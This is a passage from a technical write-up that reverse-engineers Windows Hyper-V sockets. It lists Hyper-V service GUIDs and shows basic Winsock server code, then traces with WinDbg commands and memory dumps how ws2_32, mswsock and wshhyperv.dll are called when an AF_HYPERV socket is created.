<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">7FDFD0EA-CEA8-4576-92D6-E072DDD2C422</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Machine Provisioning Service</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ACEF5661-84A1-4E44-856B-6245E69F4620</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Host Compute Service</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">999E53D4-3D5C-4C3E-8779-BED06EC056E1</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM Session Service 1</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A5201C21-2770-4C11-A68E-F182EDB29220</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VM Session Service 2</span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> “VM Session Service 1” and “VM Session Service 2” are used for PowerShell Direct work (the second GUID is used before Hyper-V socket duplication mechanism will be released. If within the same PowerShell-session 2 connections open using New-PSSession, then 2 GUID is used).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="95" src="https://lh3.googleusercontent.com/08vKFSa9V9auLPihTZPbYMrDKXHAjFG_kF5lC7jrLHw0YAHzwDZMNY32GHTZ370FdEw_kcz81nIvS1S0UdzyQ17M7mS0PDojJ_xO-jsKlNzme6ohZ8AT-OEOAD4n-tYThnr9P5UBL7EhAgq_7Q" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="444" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If to try to open 3 connections at once, then the mistake will be returned:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="151" src="https://lh4.googleusercontent.com/6u4L7F4oUH4KrtkKOuVTFMnX7SZX5F2DCxQ64O12Ob7uS_TzWhTkvlURhK1-bzjIlIdqF9EmEobmyY5lQN5MT3ksJr9tjyfL-Qezi5aO0Vt8SOCjEsHlM-UI7n0hUrhmDghESwELt7eXOLE72w" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="524" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and only two sessions will be open. When sending messages of guest OS, we can see both GUID.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="129" src="https://lh5.googleusercontent.com/mjdtfZPeJRKKqGNf1YSE5i93NLUT1Ljnkg-p076UWvtFg6BQuCV068j1xgdZmU9a5U6U8BH-XiLU_D3EcoGCLezGBkmhtpi4-1c9pZ-pseNLevtcXbBKr3eZ5eEeUqfnxU60gTDpry9M18Uagw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="418" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="129" src="https://lh5.googleusercontent.com/tMij8wdz7DghO7EGdPHEx478ujeWL49hlXng-PImUNUfg2rBvUrCOSJ9A1dirhvX0z0CYbzYI68OIF5YPa0cRZuLM5AO9AnkOgMWfkAZgaqlwyS3cxm0kjkkuwUNjGhyp1g0bGKyLTj2qeMlMQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="418" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But we will have only one channel for communication, and, respectively, one GUID is necessary: </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">B1D00D3E-FE10-4570-AD62-7648779D7A1B</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">int</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> iResult = WSAStartup(</span><span style="background-color: transparent; color: #6f008a; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MAKEWORD</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(2,2), &wsaData);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">we pass a call of WSAStartup because it hasn’t specific parameters for work with Hyper-V as sockets, we go to the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">socket</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> function at once</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;"><ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -36pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Socket</span></div>
</li>
</ol>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Values of all parameters look in the source code of the ServerExample, and we will pass directly to socket call:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #6f008a; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ZeroMemory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(&hints, </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">sizeof</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(hints));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_family = </span><span style="background-color: transparent; color: #6f008a; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AF_HYPERV</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_socktype = </span><span style="background-color: transparent; color: #6f008a; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCK_STREAM</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_protocol = </span><span style="background-color: transparent; color: #6f008a; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PROTOCOL_RAW</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ListenSocket = socket(hints.ai_family, hints.ai_socktype, hints.ai_protocol);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The code will be compiled in the following:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="64" src="https://lh4.googleusercontent.com/IZtors9-RO_5rm0dpN7F9XwmB2HmCDKKs5yyMYGygQN_JREEpc9KMS0567049lMznNbkyMXqq6rApAUqsFbAQvg95b6s6ILLs5CMfZcaE8JDTw5quNfjg5J169ZTmnwywwNPgqRV_zBRp3TA7A" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="329" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From ws2_32! WSASocketA is caused ws2_32! WSASocketW, from which was called ws2_32!DPROVIDER __ Initialize</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc poi(esp+4) L100 - – the 2nd parameter of the DPROVIDER function:: Initialize (value of the registry key Protocol_Catalog9\Catalog_Entries\000000000001)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b48c 00020026 00000000 00000000 00000000 &...............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b49c 00000008 1234191b 4ca74bf7 d7dfe086 ......4..K.L....</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b4ac 45542bc3 000003e9 00000001 00000000 .+TE............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b4bc 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b4cc 00000000 00000000 00000002 00000022 ............"...</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b4dc 00000024 00000024 00000001 00000001 $...$...........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b4ec 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b4fc 00000000 00790048 00650070 002d0072 ....H.y.p.e.r.-.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b50c 00200056 00410052 00000057 00000000 V. .R.A.W.......</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0122b51c 00000000 00000000 00000000 00000000 ................</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further we see initialization of pointer on socket helper-functions</span></div>
<div dir="ltr" style="margin-left: -5.4pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="311"></col><col width="312"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="137" src="https://lh5.googleusercontent.com/qn8LvWK8joickqtWAl0xD8yRFmQskPCr_TYWTgb7u2acgVeX6gUmDEPm4MOuKhJX9pxoIMHGiLii5OFZeJR1o87r0DKbS-av2jsx2NOZ_T7g78FYRqEwJaiqM2yeK7Pwnof_aG5soop32rAQaA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="237" /></span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="69" src="https://lh3.googleusercontent.com/bJ93Nqj2n3Fw5NH071xGJlJLO2TLmCIsAvcMYD3cJ9cuW_upsrcb7IaEzpi4BhPPc070RoWex7MOYsybiGAenBXx-nBCKrqHQe76V8Vo2drTkG2y3E-fAO6OiGgqhWOyoxZt7WBp20zCqTe7-A" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="129" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>du poi(esp)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00d5f178 "C:\Windows\system32\mswsock.dll"</span></div>
</td></tr>
</tbody></table>
</div>
<br /><br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In general in usermode enough operations is carried out, but I will try to specify only the most important of them.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further by means of LoadLibraryEx mswsock.dll is loaded, then GetProcAddress returns mswsock!WSPStartup address then execution is transferred to this function. Inside execute mswsock_initialize, then ws32SQMinit and WahCreateContextTable.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After completion of mswsock!WSPStartup, is caused the procedure mswsock!WSPSocket (through call esi) from which the function mswsock!socksocket is caused, then mswsock!sockGetTdiName, at the same time the first parameter goes:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx _GUID poi(esp+4)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_GUID *)0xf6f4a0)) : {</span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1234191B-4BF7-4CA7-86E0-DFD7C32B5445</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">} [Type: _GUID]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG> dc poi(esp+4)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f4a0 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1234191b 4ca74bf7 d7dfe086 45542bc3</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ..4..K.L.....+TE –Hyper-V RAW GUID (we can see in netsh output)</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then mswsock!SockLoadTransportList is caused, which reads out value of the section of the registry "SYSTEM\CurrentControlSet\Services\Winsock\Parameters\Transports"</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The following values is returned:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @ebx – (in ebx the pointer on the memory block transferred to mswsock!SockLoadTransportList)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01224ee0 006d0076 00750062 00000073 00730050 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">v.m.b.u.s</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">...P.s.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01224ef0 00680063 00640065 00540000 00700063 c.h.e.d...T.c.p.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01224f00 00700069 00540000 00700063 00700069 i.p...T.c.p.i.p.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01224f10 00000036 abab0000 abababab feeeabab 6..............</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mswsock!SockLoadHelperDll is called, HKLM\System\CurrentControlSet\Services\vmbus\Parameters\Winsock\HelperDllName value is requested and the C:\Windows\SysWoW64\wshhyperv.dll library is loaded (the ServerExample is compiled as 32-bit)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When we return from mswsock!SockGetTdiName address of wshhyperv!WSHOpenSocket2 is returned. This function contains only checks of correctness transfer of a socket parameters.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="142" src="https://lh5.googleusercontent.com/1nztH-EuHVT0yqO1qeIlzVqJRwgKY2pkIyDQbIGyDYrLHyVDoXB0qwSDHJ9Rp8blAqUYu_XVE40B34YHYqjtZkKKoRLjwF_JJxwYy0r9PspChdIGs-IlEMhCqyzvKe7uSgWEDY1MyaWfwWL2Gg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="330" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further GetCurrentProcess\OpenProcessToken is consecutive and then GetTokenInformation. We can see that, as _TOKEN_INFORMATION_CLASS is transferred 0x1D:</span></div>
